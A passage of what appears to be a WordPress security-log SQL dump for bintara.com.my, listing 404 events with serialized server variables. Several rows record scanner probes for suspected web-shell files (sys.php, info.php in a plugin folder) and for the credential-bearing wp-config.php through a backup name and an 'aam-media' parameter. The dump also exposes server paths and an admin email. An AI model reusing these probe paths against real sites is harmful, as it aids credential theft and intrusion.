11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:71:\"https://bintara.com.my/blogs/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:49:\"/blogs/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XahmByA4FyKWClMkejur-QAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571317255.7939\";s:12:\"REQUEST_TIME\";s:10:\"1571317255\";}}','notice','2019-10-17 13:00:57','2019-10-17 13:00:56',35044752,36857112,'https://bintara.com.my/blogs/wp-content/plugins/solid_best_corp/sys.php',1,0,'5.135.138.188'),(28220,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"58394\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XahqACA4FyKWClMkejuuRwAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571318272.5959\";s:12:\"REQUEST_TIME\";s:10:\"1571318272\";}}','notice','2019-10-17 13:17:55','2019-10-17 13:17:52',35409704,37209856,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28221,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:47:\"/wp2/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/wp2/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:47:\"/wp2/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XahuCADM-LBvHfklr3kotQAAAE0\";s:19:\"REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/wp2/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:47:\"/wp2/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XahuCADM-LBvHfklr3kotQAAAE0\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.138.188\";s:11:\"REMOTE_PORT\";s:5:\"48115\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:69:\"https://bintara.com.my/wp2/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:47:\"/wp2/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XahuCADM-LBvHfklr3kotQAAAE0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571319304.2476\";s:12:\"REQUEST_TIME\";s:10:\"1571319304\";}}','notice','2019-10-17 13:35:07','2019-10-17 13:35:04',35436056,37236176,'https://bintara.com.my/wp2/wp-content/plugins/solid_best_corp/sys.php',1,0,'5.135.138.188'),(28222,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/wp2/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/wp2/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/wp2/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XahuLyA4FyKWClMkejuxBgAAAJA\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/wp2/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/wp2/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XahuLyA4FyKWClMkejuxBgAAAJA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.138.188\";s:11:\"REMOTE_PORT\";s:5:\"52280\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/wp2/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:48:\"/wp2/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XahuLyA4FyKWClMkejuxBgAAAJA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571319343.8651\";s:12:\"REQUEST_TIME\";s:10:\"1571319343\";}}','notice','2019-10-17 13:35:45','2019-10-17 13:35:44',35040720,36844984,'https://bintara.com.my/wp2/wp-content/plugins/solid_best_corp/info.php',1,0,'5.135.138.188'),(28223,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:47:\"/dev/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/dev/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:47:\"/dev/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xah6TRouxH89@OlrmLzQmgAAAQk\";s:19:\"REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/dev/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:47:\"/dev/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xah6TRouxH89@OlrmLzQmgAAAQk\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.54.15\";s:11:\"REMOTE_PORT\";s:5:\"58930\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:69:\"https://bintara.com.my/dev/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:47:\"/dev/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xah6TRouxH89@OlrmLzQmgAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571322445.0932\";s:12:\"REQUEST_TIME\";s:10:\"1571322445\";}}','notice','2019-10-17 14:27:27','2019-10-17 14:27:25',35762112,37566176,'https://bintara.com.my/dev/wp-content/plugins/solid_best_corp/sys.php',1,0,'151.80.54.15'),(28225,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:103:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"58876\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaiF5yA4FyKWClMkeju96QAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571325416.0867\";s:12:\"REQUEST_TIME\";s:10:\"1571325416\";}}','notice','2019-10-17 15:16:59','2019-10-17 15:16:56',35409816,37206072,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28226,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-n1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-n1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-n1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaiP3QDM-LBvHfklr3kxbwAAAEI\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-n1/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.202\";s:11:\"REMOTE_PORT\";s:4:\"6156\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-n1/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-n1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaiP3QDM-LBvHfklr3kxbwAAAEI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571327965.9736\";s:12:\"REQUEST_TIME\";s:10:\"1571327965\";}}','notice','2019-10-17 15:59:29','2019-10-17 15:59:26',34390496,36196144,'https://bintara.com.my/toughbook-n1/',1,0,'157.55.39.202'),(28227,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/send-quote-teamviewer/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/send-quote-teamviewer/\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/send-quote-teamviewer/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaiZYADM-LBvHfklr3kz4QAAAFc\";s:12:\"REDIRECT_URL\";s:23:\"/send-quote-teamviewer/\";s:11:\"REMOTE_ADDR\";s:11:\"40.77.167.5\";s:11:\"REMOTE_PORT\";s:5:\"11987\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/send-quote-teamviewer/\";s:10:\"SCRIPT_URL\";s:23:\"/send-quote-teamviewer/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaiZYADM-LBvHfklr3kz4QAAAFc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571330400.4979\";s:12:\"REQUEST_TIME\";s:10:\"1571330400\";}}','notice','2019-10-17 16:40:05','2019-10-17 16:40:01',34305552,36095128,'https://bintara.com.my/send-quote-teamviewer/',1,0,'40.77.167.5'),(28228,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php~\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xaim3TieCxd@dgmfOacclAAAAI8\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php~\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaim3TieCxd@dgmfOacclAAAAI8\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"91.121.54.71\";s:11:\"REMOTE_PORT\";s:5:\"33432\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php~\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php~\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaim3TieCxd@dgmfOacclAAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571333853.1887\";s:12:\"REQUEST_TIME\";s:10:\"1571333853\";}}','notice','2019-10-17 17:37:40','2019-10-17 17:37:33',35458328,37257960,'https://bintara.com.my/wp-config.php~',1,0,'91.121.54.71'),(28229,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/wp-config.php?aam-media=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 